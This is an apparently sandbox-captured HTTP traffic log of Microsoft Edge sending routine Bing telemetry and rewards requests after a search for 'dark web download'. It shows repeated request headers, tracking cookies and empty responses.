cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306957.7f2353a
GET

https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A849%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306947865%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A849%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306947865%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

cache-control: private,no-store
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FE0473082375499E8595FDCB03B65C42 Ref B: LON601060105060 Ref C: 2024-12-04T10:09:17Z
content-length: 0
date: Wed, 04 Dec 2024 10:09:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306957.7f23543
POST

https://www.bing.com/rewardsapp/ncheader?ver=51619320&IID=SERP.5054&IG=46DB1346077049719FA2E2E87EA23DEA

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /rewardsapp/ncheader?ver=51619320&IID=SERP.5054&IG=46DB1346077049719FA2E2E87EA23DEA HTTP/2.0
host: www.bing.com
content-length: 4
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _C_Auth=
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306957.7f235a9
POST

https://www.bing.com/rewardsapp/reportActivity?IG=46DB1346077049719FA2E2E87EA23DEA&IID=SERP.5063&q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /rewardsapp/reportActivity?IG=46DB1346077049719FA2E2E87EA23DEA&IID=SERP.5063&q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0 HTTP/2.0
host: www.bing.com
content-length: 197
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _C_Auth=
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306957.7f235c1
GET

https://www.bing.com/fd/ls/l?BF=MSJ1&IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?BF=MSJ1&IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306957.7f235cc
GET

https://www.bing.com/fd/ls/l?BF=MSJ0&IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?BF=MSJ0&IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306957.7f235d0
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 415
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=4&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306957.7f235ce
GET

https://www.bing.com/aes/c.gif?type=mv&tids=23,25,27,29&rg=454c2bcc9fc941d18efa929d627c9e96&reqver=1.0

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /aes/c.gif?type=mv&tids=23,25,27,29&rg=454c2bcc9fc941d18efa929d627c9e96&reqver=1.0 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
